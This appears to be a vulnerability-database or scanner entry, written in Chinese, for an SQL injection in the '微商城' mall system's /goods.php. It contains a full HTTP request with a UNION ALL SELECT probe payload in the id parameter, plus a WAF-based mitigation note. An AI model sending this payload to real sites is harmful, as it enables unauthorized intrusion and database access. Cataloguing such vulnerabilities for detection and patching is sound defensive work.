vendor = "微商城"
name = "微商城系统goods.php存在SQL注入漏洞"
type = "SQL注入"
version = "未知"
path = "/goods.php"
detail = "GET /goods.php?id='+UNION+ALL+SELECT+NULL,NULL,NULL,CONCAT(IFNULL(CAST(MD5(1)+AS+NCHAR),0x20)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+- HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1 Accept: */* Accept-Encoding: gzip, deflate Connection: close"
fix = "WAF封禁路路径，等待发布补丁"
date = "0823"
label = "nday"
